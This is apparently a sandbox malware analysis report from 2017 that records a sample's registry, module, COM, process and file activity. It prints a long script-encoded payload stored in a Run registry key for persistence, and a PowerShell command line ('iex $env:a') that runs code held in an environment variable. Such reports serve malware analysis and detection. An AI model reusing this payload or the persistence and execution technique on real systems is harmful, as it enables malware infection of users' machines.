Read Value HKCU\software\microsoft\windows\currentversion\run\ data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 
5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. 
}CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA True 1
Fn
Module (14)
Operation Module Additional Information Success Count Logfile
Load ADVAPI32.dll base_address = 0x7feff2d0000 True 1
Fn
Load ole32.dll base_address = 0x7feff990000 True 1
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7feff990000 True 2
Fn
Get Filename process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Windows\System32\rundll32.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x77a9f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7feff2eb5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7feff2ec480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7feff2f0710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7feff9ac920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7feff9b7490 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7feff9aa4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7feff9c2e18 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = UnregisterTraceGuids, address_out = 0x77aa3c80 True 1
Fn
COM (10)
Operation Additional Information Success Count Logfile
Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 2
Fn
Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
Create interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2
Fn
Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-08-21 16:00:16 (UTC) True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 2
Fn
Process #6: powershell.exe
(Host: 695, Network: 0)
Information Value
ID #6
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" iex $env:a
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:23, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:00:49
OS Process Information
Information Value
PID 0x578
Parent PID 0x674 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f4f9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x5C4, 0x600, 0x63C, 0x50C, 0x278, 0x66C, 0x174
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False
powershell.exe.mui 0x00080000 0x00082fff Memory Mapped File Readable, Writable False False False
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True True False
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True True False
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True True False
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable True False False
private_0x0000000000100000 0x00100000 0x0013ffff Private Memory Readable, Writable True True False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000260000 0x00260000 0x00261fff Pagefile Backed Memory Readable True False False
cversions.2.db 0x00270000 0x00273fff Memory Mapped File Readable True False False
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000290000 0x00290000 0x002cffff Private Memory Readable, Writable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db 0x002d0000 0x002eafff Memory Mapped File Readable True False False
cversions.2.db 0x002f0000 0x002f3fff Memory Mapped File Readable True False False
private_0x0000000000300000 0x00300000 0x003fffff Private Memory Readable, Writable True True False
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True True False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db 0x00500000 0x0052ffff Memory Mapped File Readable True False False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x00530000 0x00595fff Memory Mapped File Readable True False False
pagefile_0x00000000005a0000 0x005a0000 0x005a0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005b0000 0x005b0000 0x005b0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory Readable, Writable True True False
pagefile_0x00000000005d0000 0x005d0000 0x00757fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000760000 0x00760000 0x008e0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000008f0000 0x008f0000 0x01ceffff Pagefile Backed Memory Readable True False False
private_0x0000000001cf0000 0x01cf0000 0x01deffff Private Memory Readable, Writable True True False
pagefile_0x0000000001df0000 0x01df0000 0x01ecefff Pagefile Backed Memory Readable True False False
private_0x0000000001ed0000 0x01ed0000 0x01edffff Private Memory Readable, Writable True True False
pagefile_0x0000000001ee0000 0x01ee0000 0x01ee0fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001ef0000 0x01ef0000 0x01f2ffff Private Memory Readable, Writable True False False
private_0x0000000001f30000 0x01f30000 0x01f3ffff Private Memory True True False
private_0x0000000001f40000 0x01f40000 0x01f4ffff Private Memory True False False
private_0x0000000001f50000 0x01f50000 0x01f8ffff Private Memory Readable, Writable True False False
private_0x0000000001f90000 0x01f90000 0x01f9ffff Private Memory True True False
private_0x0000000001fa0000 0x01fa0000 0x01faffff Private Memory True False False
private_0x0000000001fb0000 0x01fb0000 0x01feffff Private Memory Readable, Writable, Executable True True False
private_0x0000000001ff0000 0x01ff0000 0x01ffffff Private Memory True True False
private_0x0000000002000000 0x02000000 0x0200ffff Private Memory True True False
private_0x0000000002010000 0x02010000 0x0201ffff Private Memory Readable, Writable True True False
l_intl.nls 0x02020000 0x02022fff Memory Mapped File Readable False False False
private_0x0000000002030000 0x02030000 0x02030fff Private Memory Readable, Writable True True False
private_0x0000000002040000 0x02040000 0x0207ffff Private Memory Readable, Writable True False False
private_0x0000000002080000 0x02080000 0x0211ffff Private Memory Readable, Writable True True False
sorttbls.nlp 0x02120000 0x02124fff Memory Mapped File Readable False False False
private_0x0000000002130000 0x02130000 0x0213ffff Private Memory Readable, Writable True True False
private_0x0000000002140000 0x02140000 0x0217ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x02180000 0x0244efff Memory Mapped File Readable False False False
pagefile_0x0000000002450000 0x02450000 0x02842fff Pagefile Backed Memory Readable True False False
microsoft.wsman.runtime.dll 0x02850000 0x02857fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000002860000 0x02860000 0x0289ffff Private Memory Readable, Writable True False False
private_0x00000000028a0000 0x028a0000 0x0299ffff Private Memory Readable, Writable True True False
pagefile_0x00000000029a0000 0x029a0000 0x029a0fff Pagefile Backed Memory Readable True False False
private_0x00000000029b0000 0x029b0000 0x029effff Private Memory Readable, Writable True False False
private_0x0000000002a30000 0x02a30000 0x02a6ffff Private Memory Readable, Writable True False False
sortkey.nlp 0x02a70000 0x02ab0fff Memory Mapped File Readable False False False
private_0x0000000002af0000 0x02af0000 0x02b2ffff Private Memory Readable, Writable, Executable True True False
system.transactions.dll 0x02b30000 0x02b72fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000002b80000 0x02b80000 0x02bbffff Private Memory Readable, Writable True False False
private_0x0000000002bc0000 0x02bc0000 0x04bbffff Private Memory Readable, Writable True False False
private_0x0000000004c20000 0x04c20000 0x04c5ffff Private Memory Readable, Writable True False False
private_0x0000000004ca0000 0x04ca0000 0x04cdffff Private Memory Readable, Writable True False False
system.management.automation.dll 0x04ce0000 0x04fc1fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll.mui 0x04fd0000 0x0508ffff Memory Mapped File Readable, Writable False False False
powershell.exe 0x21a70000 0x21ae1fff Memory Mapped File Readable, Writable, Executable False False False
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False
system.management.automation.ni.dll 0x718d0000 0x72149fff Memory Mapped File Readable, Writable, Executable True False False
system.ni.dll 0x72150000 0x728ebfff Memory Mapped File Readable, Writable, Executable True False False
mscorlib.ni.dll 0x728f0000 0x733e7fff Memory Mapped File Readable, Writable, Executable True False False
uxtheme.dll 0x73fd0000 0x7404ffff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x74190000 0x741ebfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x741f0000 0x7422efff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x74260000 0x74267fff Memory Mapped File Readable, Writable, Executable False False False
system.transactions.ni.dll 0x74450000 0x744ebfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.wsman.management.ni.dll 0x744f0000 0x74574fff Memory Mapped File Readable, Writable, Executable True False False
system.configuration.install.ni.dll 0x74580000 0x745a4fff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.dll 0x74840000 0x74b21fff Memory Mapped File Readable, Writable, Executable False False False
microsoft.powershell.consolehost.ni.dll 0x74b30000 0x74bb0fff Memory Mapped File Readable, Writable, Executable True False False
msvcr80.dll 0x74bc0000 0x74c5afff Memory Mapped File Readable, Writable, Executable False False False
mscorwks.dll 0x74c60000 0x7520afff Memory Mapped File Readable, Writable, Executable True False False
mscoreei.dll 0x75210000 0x75287fff Memory Mapped File Readable, Writable, Executable True False False
rsaenh.dll 0x75290000 0x752cafff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x752d0000 0x752e5fff Memory Mapped File Readable, Writable, Executable False False False
slc.dll 0x752f0000 0x752f9fff Memory Mapped File Readable, Writable, Executable False False False
cscapi.dll 0x75300000 0x7530afff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x75310000 0x75328fff Memory Mapped File Readable, Writable, Executable False False False
ntshrui.dll 0x75330000 0x7539ffff Memory Mapped File Readable, Writable, Executable False False False
linkinfo.dll 0x753a0000 0x753a8fff Memory Mapped File Readable, Writable, Executable False False False
shdocvw.dll 0x753b0000 0x753ddfff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x753d0000 0x753d8fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x753e0000 0x7542bfff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x75430000 0x75450fff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x75460000 0x75554fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x75560000 0x756fdfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x75700000 0x7570afff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x75710000 0x75726fff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x75730000 0x75779fff Memory Mapped File Readable, Writable, Executable True False False
atl.dll 0x75780000 0x75793fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x757c0000 0x7581ffff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75860000 0x7590bfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x75910000 0x75992fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75ba0000 0x75c9ffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75ca0000 0x768e9fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x768f0000 0x7697ffff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x769e0000 0x769f1fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x76b30000 0x76b34fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76b40000 0x76b49fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x76b50000 0x76beffff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76bf0000 0x76cdffff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ce0000 0x76d6efff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76d70000 0x76db5fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76dc0000 0x76e5cfff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x76ee0000 0x76ef8fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f00000 0x7700ffff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x77020000 0x771bcfff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x771c0000 0x77204fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77210000 0x7736bfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77470000 0x774cffff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x774d0000 0x774f6fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x776e0000 0x77736fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077860000 0x77860000 0x77959fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077960000 0x77960000 0x77a7efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77a80000 0x77c28fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77c60000 0x77ddffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True True False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True True False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 52 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (294)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
